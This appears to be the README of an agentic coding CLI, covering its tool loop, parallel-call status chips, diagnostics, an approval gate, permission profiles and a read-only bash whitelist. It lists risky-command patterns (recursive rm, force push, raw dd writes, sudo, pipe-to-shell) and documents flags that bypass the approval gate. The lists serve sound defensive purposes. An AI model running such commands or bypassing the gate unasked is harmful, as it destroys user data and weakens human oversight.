- Conflict chip (`⚠`, Tier 1.8): when two tracked writes (`write_file` / `edit_file` / `delete_file`) in the same batch target the same path, a `⚠ <path> · colliding writes at indices i,j` row warns that they'd race; under the `default` profile this also escalates the batch to the plan gate (Path A) so you approve before they apply.
- Batch timing (`⚡ N tools · <time>`, Tier 1.7): the closing bracket of every batch; wallclock for the concurrent dispatch, `Nms` under a second, `N.Ns` over.
- Cost row (`💸`, Tier 1.9): a per-turn token estimate row (`~<in> in / ~<out> out · <total> tok`). Anthropic reports real usage; Ollama is a `chars/4` estimate.
Under --verbose (or /verbose on) the cluster expands homogeneously (Tier 1.9): each pending pill gains a dim ↳ args: <full JSON> line, each completed pill a ↳ result preview, the timing line names the ↳ slowest: <tool>, and the cost row annotates ↳ estimate (chars/4) vs. ↳ model-reported.
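The timing and cost rows follow simple formatting rules that can be sketched as pure functions. The function names are hypothetical, and rounding the `chars/4` estimate up with `Math.ceil` is an assumption; the real chip code may round differently.

```typescript
// "Nms" under a second, "N.Ns" at a second or more.
function formatBatchTiming(toolCount: number, elapsedMs: number): string {
  const time =
    elapsedMs < 1000
      ? `${Math.floor(elapsedMs)}ms`
      : `${(elapsedMs / 1000).toFixed(1)}s`;
  return `⚡ ${toolCount} tools · ${time}`;
}

// Fallback estimate when the provider reports no usage: roughly 4 chars per token.
function estimateTokens(text: string): number {
  return Math.ceil(text.length / 4);
}

function formatCostRow(inputText: string, outputText: string): string {
  const tokensIn = estimateTokens(inputText);
  const tokensOut = estimateTokens(outputText);
  return `💸 ~${tokensIn} in / ~${tokensOut} out · ${tokensIn + tokensOut} tok`;
}
```

For a provider that reports real usage, the two estimates would simply be replaced by the reported counts before formatting.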
Free engine troubleshooting (/doctor)
Run /doctor anytime to check whether the free (Ollama) engine is set up
correctly. It probes the configured provider, lists installed models, flags
which ones can do tool calling, and tells you the next step.
- ✅ All green → "Free engine ready" — start typing.
- ⚠️ Ollama not reachable → install + start, with copy-pasteable setup steps.
- ⚠️ Model not installed → "set OLLAMA_MODEL= in .env" if a tool-capable one is already on disk, or `ollama pull <model>` if not.
- For Anthropic, `/doctor` just verifies `ANTHROPIC_API_KEY` is set.
Troubleshooting
When a check fails, ask for the root cause and a one-line fix instead of a bare status:
/doctor --explain server # is the Ollama daemon reachable? how to start it
/doctor --explain model # is the configured model installed? pull recipe
/doctor --explain key # is ANTHROPIC_API_KEY set? where to get one
/doctor --explain tools # are tools registered?
Each prints `cause:` (what's actually wrong) and `fix:` (a copy-pasteable next step). `model` defers to `server` when the server is down, so you fix the upstream problem first.
| Symptom | Try |
|---|---|
| "Ollama not reachable" | /doctor --explain server → ollama serve, or fix OLLAMA_BASE_URL |
| Model answers but ignores tools | model isn't tool-capable — /doctor lists which installed models are; switch with /model or OLLAMA_MODEL |
| Last few characters of an answer look cut off | fixed in 0.4.x — update; the streaming flush now drains trailing chars |
| Every command prompts even safe ones | you're on the paranoid profile — /profile default |
| bash calls are refused | you're on the readonly profile — /profile default |
| Approval prompt loops in a script | non-TTY can't approve — pass --no-approve or set MY_AI_AUTO_APPROVE=1 |
Approval gate
Destructive and shell-spawning tools (bash, delete_file, read_lints) show [y/N] before running — the safe default. Bypass it when you trust the session:
- One-shot (per invocation): `my-ai --no-approve`
- Persistent (set once in `.env`): `MY_AI_AUTO_APPROVE=1` (also accepts `true` / `yes` / `on`)
When the gate is bypassed, every gated call runs without prompting and a ⚠ auto-approved (--no-approve) line is logged to stderr. Reads, writes, edits, glob, grep, web fetch, web search, and todo tracking are never gated.
The decision line under each prompt tells you exactly what will happen — e.g. $ rm -rf node_modules for bash, the file path for delete_file, or the file being linted for read_lints. When the command matches a risky pattern (recursive rm, --force / --force-with-lease, force push, raw dd writes, chmod/chown, sudo, pipe-to-shell, git reset --hard/rebase/filter-branch) a red danger badge is shown on the prompt so it can't be rubber-stamped.
Every gate decision — auto-approved, whitelisted, approved, rejected, blocked — is appended to .my-ai/audit.log (tab-separated: timestamp, decision, tool, danger tags, input preview). Logging is best-effort and never blocks the loop. .my-ai/ is gitignored.
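Danger tagging and the tab-separated audit row can be sketched as below. Only the column order (timestamp, decision, tool, danger tags, input preview) comes from the text; the tag names, the regexes, the comma used to join tags, and the helper names are assumptions covering just a few of the listed patterns.

```typescript
// A few illustrative patterns; tag names are hypothetical.
const DANGER_PATTERNS: Array<[string, RegExp]> = [
  ["recursive-rm", /\brm\s+(-\w*r\w*|--recursive)\b/i],
  ["force-flag", /--force(-with-lease)?\b/],
  ["sudo", /\bsudo\b/],
  ["pipe-to-shell", /\|\s*(sh|bash)\b/],
  ["git-reset-hard", /\bgit\s+reset\s+--hard\b/],
];

// Return the tag of every pattern the command matches.
function dangerTags(command: string): string[] {
  return DANGER_PATTERNS.filter(([, re]) => re.test(command)).map(([tag]) => tag);
}

interface AuditEntry {
  timestamp: string;
  decision: string; // e.g. auto-approved, whitelisted, approved, rejected, blocked
  tool: string;
  dangerTags: string[];
  inputPreview: string;
}

// One tab-separated row; tabs and newlines in the preview are flattened to spaces.
function auditLine(e: AuditEntry): string {
  const preview = e.inputPreview.replace(/[\t\r\n]+/g, " ");
  return [e.timestamp, e.decision, e.tool, e.dangerTags.join(","), preview].join("\t");
}
```

Flattening whitespace in the preview keeps each decision on a single line, so the log stays easy to filter with line-oriented tools.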
Permission profiles
A coarse safety dial layered on top of the per-command whitelist. Switch at runtime with /profile <name>; the choice persists to .my-airc (gitignored). You can also set it per session with MY_AI_PROFILE, which takes precedence over the file.
| Profile | Per-tool gate | --no-approve / MY_AI_AUTO_APPROVE | Tier 1.4 plan gate (write-heavy batch) |
|---|---|---|---|
| default | Read-only bash auto-approved via whitelist; other gated tools prompt [y/N]. | Bypasses the [y/N] prompt (decision still audit-logged). | Fires on ≥2 file writes or ≥50 estimated new lines; a Tier 1.8 same-path collision also escalates an under-threshold batch to the plan card (Path A). Approving the plan suppresses the per-write diff prompts. |
| readonly | Refuses subprocess-spawning tools (bash, read_lints) outright. File read/write/edit still work. | N/A for shell tools (already blocked). | Skipped — writes are allowed, but nothing shells out. |
| paranoid | Every tool call (except ask_user) requires [y/N]. | Ignored — paranoid always prompts. | Layered: you see the plan card and each per-write diff prompt. |
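The per-tool column of the table can be read as a small decision function. This sketch is an interpretation, not the CLI's code: `decideGate` and its input shape are hypothetical, the gated-tool set is taken from the Approval gate section, and anything the table leaves unspecified (for example `delete_file` under `readonly`) falls through to the `default` behavior here as an assumption.

```typescript
type Profile = "default" | "readonly" | "paranoid";
type GateAction = "run" | "prompt" | "refuse";

interface GateInput {
  profile: Profile;
  tool: string;
  autoApprove: boolean;             // --no-approve or MY_AI_AUTO_APPROVE
  whitelistedReadOnlyBash: boolean; // result of the read-only bash whitelist
}

const SHELL_TOOLS = new Set(["bash", "read_lints"]);
const GATED_TOOLS = new Set(["bash", "delete_file", "read_lints"]);

function decideGate(i: GateInput): GateAction {
  // paranoid: everything except ask_user prompts, and auto-approve is ignored.
  if (i.profile === "paranoid") return i.tool === "ask_user" ? "run" : "prompt";
  // readonly: subprocess-spawning tools are refused outright.
  if (i.profile === "readonly" && SHELL_TOOLS.has(i.tool)) return "refuse";
  // Ungated tools (reads, writes, edits, search, ...) run directly.
  if (!GATED_TOOLS.has(i.tool)) return "run";
  // Whitelisted read-only bash is auto-approved.
  if (i.tool === "bash" && i.whitelistedReadOnlyBash) return "run";
  return i.autoApprove ? "run" : "prompt";
}
```

Checking `paranoid` first is what makes the auto-approve flag irrelevant under that profile.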
Environment variables
| Var | Values | Effect |
|---|---|---|
| MY_AI_PROFILE | default | readonly | paranoid | Permission profile for the session; takes precedence over .my-airc. |
| MY_AI_AUTO_APPROVE | 1 / true / yes / on | Skip the [y/N] approval prompt (every decision is still audit-logged). Same effect as the --no-approve flag. |
| MY_AI_SAFE_COMMANDS | CSV / whitespace list of binary basenames | Extend the read-only bash whitelist without forking (e.g. pnpm,bun,deno,npx). Metachar + destructive-flag checks still apply. |
| MY_AI_COMPACTION_BUDGET | positive integer (default 8000) | Token budget before older turns are compacted. Negative / non-numeric throws fast on the first compaction call. |
| MY_AI_AUTO_SERIALIZE | 1 / true / yes / on | Tier 1.8 Path B (opt-in, off by default). On a same-path write_file / edit_file / delete_file collision in a batch under the default profile, src/plan.ts serializeCollisions reorders the colliding calls into a sequential slice so writes apply lowest-index→highest-index (the highest-index write wins, no Promise.all race), and src/chips.ts printAutoSerializeNote surfaces a neutral dim ↳ auto-serialized: <path> indices <i,j,k> row instead of the Tier 1.8 ⚠ warning. The Tier 1.4 plan-gate escalation (Path A) is also skipped. End-to-end exercised by Scenario E in tools/tier1.6-chip-smoke.ts. |
| MY_AI_PERSONA | path to a persona file | Voice / push-back / style-defaults caption, resolved at boot (file path only — not inline text). Falls back to .my-ai/persona.md, then the built-in default. |
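The boolean variables in the table accept 1 / true / yes / on. A minimal sketch of such a flag parser follows; the `envFlag` name is hypothetical, and the trimming and case-insensitive matching are assumptions, not documented behavior.

```typescript
const TRUTHY = new Set(["1", "true", "yes", "on"]);

// Returns true only for the documented truthy spellings.
// Assumption: surrounding whitespace and letter case are ignored.
function envFlag(value: string | undefined): boolean {
  return value !== undefined && TRUTHY.has(value.trim().toLowerCase());
}
```

In a Node process this would be called as `envFlag(process.env.MY_AI_AUTO_APPROVE)`.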
Reasoning models (think discipline)
Reasoning-capable Ollama models (deepseek-r1, qwen3 with reasoning mode, llama 3.x with extended thinking) and Anthropic Claude with extended thinking emit a private scratch section in their response: between <think>…</think> markers for Ollama, or as a separate thinking content block for Anthropic. The CLI captures that section as a dim "thinkpad" transcript on stderr (prefixed with a thinking emoji) so you can see what the model is reasoning about, and the final stored assistant message has the section and its markers stripped so the reasoning never becomes payload for the next turn. The visible answer on stdout stays clean.
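To make the split concrete, here is a minimal sketch that separates reasoning from the visible answer in a complete message, assuming the Ollama markers are the `<think>`…`</think>` tags that models such as deepseek-r1 emit. It uses a single regex over the finished text, which is a simplification: src/think.ts is described as a state machine, presumably so it can handle streamed chunks. The `splitThink` name is hypothetical.

```typescript
interface SplitResult {
  visible: string;     // what would go to stdout and into stored history
  reasoning: string[]; // what would go to the dim stderr transcript
}

// Pull every <think>...</think> span out of a complete message.
function splitThink(text: string): SplitResult {
  const reasoning: string[] = [];
  const visible = text.replace(/<think>([\s\S]*?)<\/think>/g, (_match, inner: string) => {
    reasoning.push(inner.trim());
    return "";
  });
  return { visible: visible.trim(), reasoning };
}
```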
Whitelisted read-only bash commands
A small set of obviously-safe bash commands skip the prompt entirely, even when the gate is on. They are logged as ⚙ safe (whitelisted read-only: <command>).
- Plain binaries (any args): ls, cat, head, tail, less, more, wc, file, stat, pwd, tree, du, basename, dirname, realpath, readlink, which, whereis, type, grep, rg, diff, sort, uniq, tr, cut, strings, ps, top, htop, pgrep, help, man, info, history, env, printenv, echo, date, whoami, hostname, uname, uptime, jq, xxd, hexdump, base32, base64
- git read-only subcommands (2nd token): status, log, diff, show, branch, remote, rev-parse, tag, stash, ls-files, ls-tree, shortlog, describe, blame, reflog (note: config is not whitelisted; git config foo bar writes to .git/config, so it always prompts)
- npm read-only subcommands (2nd token): test, ls, view, list, info, audit
Extending the whitelist (no fork needed)
You can extend the safe-command list without forking the project via the
MY_AI_SAFE_COMMANDS env var. Comma- or whitespace-separated binary basenames
are added to the read-only set; useful for opting pnpm, bun, deno,
npx, etc., into the auto-approved pattern. Example in .env:
MY_AI_SAFE_COMMANDS=pnpm,bun,deno,npx
Safety checks (metachars, destructive flags) still run first and
unconditionally, so this widens read-only recognition but never bypasses
the lookup. The leading-token match is basename-based, so /usr/local/bin/pnpm
and pnpm both register as pnpm. To stay safe, do NOT add bash, sh,
python, node, or any other subshell-capable binary — they'd auto-pass
the leading-token check, and a bash -c … invocation wouldn't trip any
metachar inside the -c argument.
The whitelist refuses any command with shell metacharacters (; & | < > $ ( ) { } ^ ` =) or destructive flags (-delete, -exec, --rm, --delete, --force, --write, --set-output). Anything that could chain (&&) or pipe (|) into another command always prompts. Commands not on the list also always prompt: better safe than quiet.
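The order of checks described in this section (metacharacters and destructive flags first, then a basename lookup of the leading token) can be sketched as follows. This is an illustration, not the code in src/whitelist.ts: the binary and git lists are abbreviated, and the function names are hypothetical.

```typescript
// Abbreviated copies of the lists above, for illustration only.
const SAFE_BINARIES = new Set(["ls", "cat", "head", "tail", "wc", "grep", "pwd"]);
const SAFE_GIT = new Set(["status", "log", "diff", "show", "branch"]);
const METACHARS = /[;&|<>$(){}^`=]/;
const DESTRUCTIVE_FLAGS = new Set([
  "-delete", "-exec", "--rm", "--delete", "--force", "--write", "--set-output",
]);

// Split a MY_AI_SAFE_COMMANDS value on commas and/or whitespace.
function parseSafeCommands(raw: string | undefined): string[] {
  return (raw ?? "").split(/[\s,]+/).filter((s) => s.length > 0);
}

// "/usr/local/bin/pnpm" and "pnpm" both reduce to "pnpm".
function basename(p: string): string {
  return p.slice(p.lastIndexOf("/") + 1);
}

function isWhitelisted(command: string, extra: string[] = []): boolean {
  // Safety checks run first and unconditionally.
  if (METACHARS.test(command)) return false;
  const tokens = command.trim().split(/\s+/);
  if (tokens.some((t) => DESTRUCTIVE_FLAGS.has(t))) return false;
  // Only then is the leading token looked up by basename.
  const bin = basename(tokens[0]);
  if (bin === "git") return tokens.length > 1 && SAFE_GIT.has(tokens[1]);
  return SAFE_BINARIES.has(bin) || extra.indexOf(bin) !== -1;
}
```

With this shape, an entry added through MY_AI_SAFE_COMMANDS can only widen the final lookup; it never skips the two checks above it.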
Compaction budget
When the running message list exceeds the compact-trigger threshold (in estimated tokens), the oldest turns are folded into a single summary and the tail is preserved verbatim (see src/compaction.ts). The threshold defaults to 8000 tokens (cheap chars/4 heuristic, no tokenizer dependency).
For long sessions and large contexts you may want to raise it. For shorter conversations or hardware-constrained runners you may want to lower it. Set in .env:
# Tunable; must be a non-negative integer. Leave unset to use 8000.
MY_AI_COMPACTION_BUDGET=8000
Bad input (negative, non-numeric) fails fast on the first compaction call with a clear message, which is easier to debug than a silent fallback. Calling code can also pass maxTokens explicitly to compactMessages(), which always wins over the env var.
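A minimal sketch of the pieces described here: the chars/4 estimate, fail-fast budget parsing, and folding older turns into one summary while keeping the tail. It is not the code in src/compaction.ts. The `keepTail` parameter, the placeholder summary text, and the function names are assumptions, and zero is accepted as a budget only because the .env comment says "non-negative".

```typescript
interface Msg {
  role: "system" | "user" | "assistant" | "tool";
  content: string;
}

// Cheap token estimate: one token per four characters, rounded up.
const estimateTokens = (text: string): number => Math.ceil(text.length / 4);

// Parse the budget; negative or non-numeric input throws instead of falling back.
function resolveBudget(raw: string | undefined, fallback = 8000): number {
  if (raw === undefined || raw.trim() === "") return fallback;
  const n = Number(raw);
  if (!Number.isInteger(n) || n < 0) {
    throw new Error(`MY_AI_COMPACTION_BUDGET must be a non-negative integer, got "${raw}"`);
  }
  return n;
}

// Fold everything except the last `keepTail` messages into one summary message.
// The summary here is a placeholder string, not a real summary of the turns.
function compact(messages: Msg[], maxTokens: number, keepTail = 4): Msg[] {
  const total = messages.reduce((sum, m) => sum + estimateTokens(m.content), 0);
  if (total <= maxTokens || messages.length <= keepTail) return messages;
  const head = messages.slice(0, messages.length - keepTail);
  const tail = messages.slice(messages.length - keepTail);
  const summary: Msg = { role: "system", content: `[summary of ${head.length} earlier messages]` };
  return [summary, ...tail];
}
```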
Try it
you › create a hello.py file that prints "hello from my-ai" and runs it
You should see the model planning (TodoWrite), then creating the file, then running it via bash.
Worked examples
Longer, real workflows live in examples/:
- examples/refactor.md: a multi-file rename with the test suite pinned as a safety net.
- examples/whitelist-extension.md: opt pnpm / bun / deno into the read-only whitelist via MY_AI_SAFE_COMMANDS.
- examples/think-discipline.md: what the dim stderr thinkpad looks like next to the clean stdout answer.
- examples/v0.7.4-buffy-prompts.md: the v0.7.4 release-flow split, with 5 Buffy-side (B1–B5) prompts paired with Claude's C1–C5. B1–B3 are the smoke × 3 + README-parity + Scenario E additions; B4–B5 are the npm publish + git push / gh release ops.
Parallel-tool chip layer (Tier 1.6 – 1.9)
When the model emits a parallel batch of tool calls, every batch reads as a bookended cluster on stderr:
- Tier 1.6 pending → completed pills. A dim ⚡ N tool(s) in parallel header followed by cyan ○ pending pills (one per call), then a tinted completed pill below each: green ● ok, red ✖ err, yellow ⊘ blocked. The hint next to each completed pill summarizes the effect: path · CREATE (+N lines) for write_file, ±N lines for edit_file, $ cmd · N lines for bash, path · deleted, path · N issues for read_lints, etc. Pure presentation in src/chips.ts, ~180 lines.
- Tier 1.7 cumulative batch timing. A second dim ⚡ N tool(s) · <time> line closes every batch with the wallclock of the parallel dispatch, e.g. ⚡ 3 tools · 234ms. Anchors the perf signal to the chips it timed.
- Tier 1.8 parallel-conflict detection. Two PLAN_TRACKED_TOOLS calls in the same parallel batch targeting the same path (currently write_file / edit_file / delete_file) would otherwise resolve silently as last-write-wins under Promise.all. A neutral dim ⚠ <path> · colliding writes at indices <i,j,k> row renders AFTER the completed chips but BEFORE the timing summary, one per detected collision. The default profile also escalates these batches to the Tier 1.4 plan gate (the user reviews the colliding writes BEFORE they race) via src/cli.ts agentTurn's new threshold.trigger: "conflict". Path A (escalate-to-prompt) is current; Path B (auto-serialize) is opt-in via MY_AI_AUTO_SERIALIZE=1.
- Tier 1.9 verbose-mode homogeneity. Under --verbose (or /verbose on), every chip class threads the flag: completed pills get a dim ↳ <result preview> line; pending pills get a dim ↳ args: <full JSON> line; the cumulative batch timing gets · slowest: <name> <ms|secs>; the conflict chip gets (name1, name2) so you can see WHICH tools raced. Non-verbose callers get the byte-identical Tier 1.6 output.
- Tier 1.9 per-turn cost chip. The Anthropic SDK reports exact input_tokens / output_tokens (↳ model-reported under verbose). The OpenAI-compatible Ollama endpoint doesn't surface usage, so output_tokens is approximated via the same Math.ceil(visibleContent.length / 4) heuristic the compactor uses (↳ estimate (chars/4) under verbose). The chip renders as a single dim 💸 ~<in> in / ~<out> out · <total> tok row between the conflict chips and the timing summary.
The full chip surface is pinned in tests/chips.test.ts (55 fixtures) and end-to-end exercised by tools/tier1.6-chip-smoke.ts (5 scenarios: A defaults, B verbose, C readonly, D parallel-conflict, E auto-serialize). Every claim above has a fixture or smoke scenario.
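The Tier 1.8 check amounts to grouping a batch's tracked calls by target path and reporting any path hit more than once. A minimal sketch under assumptions: the `ToolCall` shape and the `path` argument name are hypothetical, paths are compared as raw strings with no normalization, and this is not the code in src/plan.ts or src/chips.ts.

```typescript
// Hypothetical call shape; the real argument name may differ.
interface ToolCall {
  name: string;
  args: { path?: string };
}

const PLAN_TRACKED_TOOLS = new Set(["write_file", "edit_file", "delete_file"]);

// Map each path touched by two or more tracked calls to the batch indices involved.
function findCollisions(batch: ToolCall[]): Map<string, number[]> {
  const byPath = new Map<string, number[]>();
  batch.forEach((call, i) => {
    const path = call.args.path;
    if (!PLAN_TRACKED_TOOLS.has(call.name) || path === undefined) return;
    const indices = byPath.get(path) ?? [];
    indices.push(i);
    byPath.set(path, indices);
  });
  const collisions = new Map<string, number[]>();
  byPath.forEach((indices, path) => {
    if (indices.length > 1) collisions.set(path, indices);
  });
  return collisions;
}

// Render the warning row in the format quoted above.
function conflictRow(path: string, indices: number[]): string {
  return `⚠ ${path} · colliding writes at indices ${indices.join(",")}`;
}
```

Because the indices come out in ascending order, the same map could drive an auto-serialize path that applies the colliding writes lowest index first.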
Tool inventory
| Tool | What it does |
|---|---|
| read_file | Reads file contents. Supports offset/limit for large files. |
| write_file | Creates or overwrites a file (creates parent dirs). |
| edit_file | Targeted string replacement. Errors if old_string isn't unique. |
| bash | Runs shell commands with 5-minute timeout. Reserved for things that need a shell. |
| list_dir | Lists immediate contents of a directory. |
| Glob | Finds files by glob pattern (e.g. **/*.ts). |
| Grep | Searches file contents with regex. Ripgrep when available, falls back to a pure-Node walker. |
| WebFetch | Fetches a URL and returns readable text (strips HTML). |
| TodoWrite | Tracks a task list in conversation. The model uses this to plan its work. |
| ask_user | Pauses the loop and asks the human a structured question (single or multi select, with optional free-form fallback). Use when a decision, blocker, or missing credential should not be auto-resolved. Replaces ad-hoc prose questions with clean schema answers. |
| tree | Compact read-only directory tree. Wraps src/explore.ts#fsTree. Skips node_modules, .git, and dotfiles by default; capped at depth 3 + 200 entries. The same helper powers the /tree slash command, so a delegated explorer / reviewer sub-agent can map a project without a flood of list_dir calls. |
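The uniqueness rule for edit_file can be illustrated with a short sketch. The table only states that a non-unique old_string is an error; the "not found" and empty-string errors, the error messages, and the `applyEdit` name are assumptions for the example.

```typescript
// Replace exactly one occurrence of oldString, refusing ambiguous edits.
function applyEdit(content: string, oldString: string, newString: string): string {
  if (oldString === "") throw new Error("old_string must not be empty");
  // Count non-overlapping occurrences.
  const count = content.split(oldString).length - 1;
  if (count === 0) throw new Error("old_string not found");
  if (count > 1) throw new Error(`old_string is not unique (${count} matches)`);
  const at = content.indexOf(oldString);
  // Slice-and-join avoids String.replace's special handling of "$" in the replacement.
  return content.slice(0, at) + newString + content.slice(at + oldString.length);
}
```

Requiring a unique match forces the caller to include enough surrounding context to pin down the intended location.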
Project structure
src/
├── cli.ts # Main chat loop, message history, slash commands, approval gate
├── client.ts # Provider dispatcher (reads PROVIDER env); runtime provider switch
├── doctor.ts # /doctor + /doctor --explain (free-engine diagnostics)
├── prompts.ts # System prompt (independently written; Claude Code-style behavior)
├── server.ts # `my-ai serve` HTTP + SSE + /api/upload layer (BW-A1)
├── agent-engine.ts # chat → tool dispatch loop shared with REPL's agentTurn (BW-A1)
├── tools.ts # Tool definitions + execute() handlers
├── whitelist.ts # Bash read-only whitelist + MY_AI_SAFE_COMMANDS merge (testable)
├── danger.ts # Danger tagging for the approval prompt
├── audit.ts # Append-only approval audit log (.my-ai/audit.log)
├── profiles.ts # Permission profiles (default/readonly/paranoid)
├── compaction.ts # Long-context compaction (fold oldest turns into a summary)
├── tokens.ts # /tokens report (per-role + total + budget + utilization; reuse compaction's heuristic)
├── think.ts # think-discipline state machine (visible vs. reasoning)
├── multimodal.ts # File → ContentPart[] (image_url, text block, pdf extract, routed note) (BW-A2)
├── mentions-resolve.ts # REPL @mention + serve uploaded-file → resolver, vision-gate aware (BW-A2)
├── image-meta.ts # Pure image-header decoder (PNG/JPEG/GIF/WebP/BMP → {width,height,mime}) (BW-A2)
├── lang-detect.ts # Per-message lang/code heuristic for the chat wire (BW-A2)
└── providers/
    ├── types.ts # Provider interface, normalized Message types
    ├── capabilities.ts # providerSupportsImages(name, model) regex gate (BW-A2)
    ├── anthropic.ts # Anthropic Claude SDK adapter
    ├── ollama.ts # OpenAI-compatible adapter (Ollama, LM Studio, vLLM)
    └── mock.ts # Offline scripted provider (test/smoke only, gated behind MY_AI_MOCK)
ui/
└── index.html # `my-ai serve` chat UI shell, single-file HTML + inline JS (BW-A1)
How the tool loop works
- You type a message.
- The CLI sends it to the configured provider along with conversation history + available tools.
- The model responds. It may:
  - Return text only: we print it and end the turn.
  - Call one or more tools: we run them in parallel, feed the results back as tool messages, and the model gets another turn.
- The loop continues until the model's response has no tool_calls (i.e. it's done).
This is the same agentic tool-loop pattern Claude Code uses, reimplemented here from its publicly documented behavior.
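The steps above can be sketched as a short loop. This is a simplified illustration, not the code in src/cli.ts or src/agent-engine.ts: the `Message` and `ToolCall` shapes, the `ChatFn` / `ToolFn` types, the `runTurn` name, and the `maxSteps` guard are all assumptions, and the approval gate is omitted.

```typescript
interface ToolCall { id: string; name: string; args: Record<string, unknown>; }
interface Message {
  role: "user" | "assistant" | "tool";
  content: string;
  toolCalls?: ToolCall[];
  toolCallId?: string;
}
type ChatFn = (history: Message[]) => Promise<Message>;
type ToolFn = (args: Record<string, unknown>) => Promise<string>;

async function runTurn(
  userText: string,
  history: Message[],
  chat: ChatFn,
  tools: Record<string, ToolFn>,
  maxSteps = 10, // assumption: a guard against endless tool loops
): Promise<string> {
  history.push({ role: "user", content: userText });
  for (let step = 0; step < maxSteps; step++) {
    const reply = await chat(history);
    history.push(reply);
    const calls = reply.toolCalls ?? [];
    // No tool calls means the model is done: return its text.
    if (calls.length === 0) return reply.content;
    // Run every requested tool in parallel and feed results back as tool messages.
    const results = await Promise.all(
      calls.map(async (call): Promise<Message> => {
        const tool = tools[call.name];
        const content = tool
          ? await tool(call.args).catch((e) => `error: ${String(e)}`)
          : `error: unknown tool ${call.name}`;
        return { role: "tool", content, toolCallId: call.id };
      }),
    );
    history.push(...results);
  }
  throw new Error(`no final answer after ${maxSteps} steps`);
}
```

Tool failures are returned to the model as text rather than thrown, so one failing call does not abort the rest of the batch.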
Customizing
- Change the model: edit OLLAMA_MODEL (or ANTHROPIC_MODEL) in .env.
- Change the personality: edit src/prompts.ts.
- Add a tool: define a ToolHandler in src/tools.ts and add it to the tools array.
- Add a new provider: implement the Provider interface in a new file under src/providers/, then wire it up in src/client.ts.
Limitations
This is an MVP focused on being easy to read and run.
- Approval prompts gate destructive / shell-spawning tools (bash, delete_file, read_lints) by default; bypass with --no-approve or MY_AI_AUTO_APPROVE=1 (see above).
- No conversation persistence: /exit clears history. Restart loses context.
- No sub-agent spawning: unlike Codebuff or Claude Code's Task tool, there's just one model.
- No file_path:line_number rendering in the CLI (the model produces them, but the terminal won't hyperlink).
- Local model quality is hardware-dependent: a 3b model will make mistakes a 32b won't. Pick a size that matches your GPU.
Contributing
- CHANGELOG convention: every commit that ships a user-facing feature, behavior change, deprecation, or safety fix updates [CHANGELOG.md](./CHANGELOG.md)'s [Unreleased] section in the same commit (same-commit-per-feature rule). Doc-only, test-only, refactor-only, and chore commits are exempt, since they don't ship anything a user would notice. See the top of CHANGELOG.md for the full rationale.
- Tests pin behavior: any new code under src/ must also land a pinned test in tests/ (the established pattern is src/whitelist.ts + tests/whitelist.test.ts, a SAFE/UNSAFE battery that locks the safety boundary). Run npm test before committing. Regressions in the safety boundary are a real risk if tests are skipped.
- Typecheck before commit: npm run typecheck must pass. CI (.github/workflows/ci.yml) runs typecheck + test + smoke on Node 20 and 22; the .githooks/pre-push hook runs the same gate locally (enable with git config core.hooksPath .githooks).
- Commit message style: Conventional Commits prefix. Established prefixes in this repo: feat: (new feature), feat(scope): (scoped feature, e.g. feat(doctor)), fix: (bug fix), fix(scope): (scoped fix), chore(release): (release cut), docs: (doc-only commit that doesn't ship a behavior change). Use the scope tag to tie the commit to its component.
- Releasing: when shipping a version, the cut is mechanical:
  - Open CHANGELOG.md, rename ## [Unreleased] to ## [X.Y.Z] - YYYY-MM-DD, moving its contents into the new dated block, and leave [Unreleased] empty for the next cycle.
  - Bump version in package.json to match.
  - Commit with chore(release): cut vX.Y.Z — <one-line summary> (use scoped env-var identity so global git config isn't touched; see chore(release): cut v0.4.0 for the established form).
  - Tag locally: git tag -a vX.Y.Z -m "vX.Y.Z — <summary>".
  - Extract the new section to release notes: bash tools/cut-release-section.sh vX.Y.Z > /tmp/vX.Y.Z-notes.md. The helper uses substring match so dotted version forms don't get tripped up by awk regex metachars.
  - Push: git push origin main (the release commit) and git push origin vX.Y.Z (the tag).
  - Publish: gh release create vX.Y.Z --title "vX.Y.Z — <summary>" --notes-file /tmp/vX.Y.Z-notes.md.
  - Rebuild the source tarball: git archive --format=tar.gz -o my-ai-vX.Y.Z.tar.gz vX.Y.Z (always from the local tag, never HEAD, which keeps the tarball pinned to the released state).
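The reason for substring matching in the release-notes helper is that the dots in a version like 0.4.0 are wildcards when treated as a regex. The sketch below shows the same idea in TypeScript; it is not a port of tools/cut-release-section.sh, and it assumes section headings of the form ## [X.Y.Z] - YYYY-MM-DD as described in the steps above. The `extractSection` name is hypothetical.

```typescript
// Return the body of the "## [X.Y.Z] ..." section, without the heading line.
function extractSection(changelog: string, version: string): string {
  const bare = version.replace(/^v/, "");
  const lines = changelog.split("\n");
  // Plain substring test: "[0.4.0]" cannot accidentally match "[0x4y0]" or "[0.4.01]".
  const start = lines.findIndex((l) => l.startsWith("## ") && l.includes(`[${bare}]`));
  if (start === -1) throw new Error(`no CHANGELOG section for ${version}`);
  let end = lines.findIndex((l, i) => i > start && l.startsWith("## "));
  if (end === -1) end = lines.length;
  return lines.slice(start + 1, end).join("\n").trim();
}
```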
Hardware sanity check
| Ollama model size | RAM | Recommended hardware |
|---|---|---|
| 3B params | 4 GB | Any modern laptop, CPU OK (slow) |
| 7B params | 8 GB | 8 GB+ NVIDIA GPU recommended |
| 13B params | 12 GB | 12 GB+ NVIDIA GPU |
| 32B params | 20 GB | 24 GB GPU (e.g. RTX 3090/4090) |
| 70B+ params | 40+ GB | Multi-GPU / server-grade |
If you have no GPU, stick to 3B and accept ~2–5 tokens/sec. With even a 6 GB GPU, 7B feels fast.
License
MIT
